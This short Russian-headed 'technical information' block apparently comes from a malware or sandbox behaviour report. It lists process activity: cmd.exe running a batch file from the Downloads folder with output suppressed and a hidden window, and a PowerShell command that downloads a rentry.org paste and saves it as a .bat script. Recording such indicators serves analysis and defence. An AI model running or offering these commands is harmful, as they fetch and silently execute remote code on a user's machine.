Техническая информация
- '<SYSTEM32>\cmd.exe' /c %HOMEPATH%\Downloads\execute_script.bat >NUL 2>NUL
- %HOMEPATH%\downloads\execute_script.bat
- nul
- '<SYSTEM32>\cmd.exe' /c %HOMEPATH%\Downloads\execute_script.bat >NUL 2>NUL' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "(Invoke-WebRequest 'https://rentry.org/oofpd/raw').Content | Out-File -Encoding utf8 -FilePath '%HOMEPATH%\Downloads\script.bat'"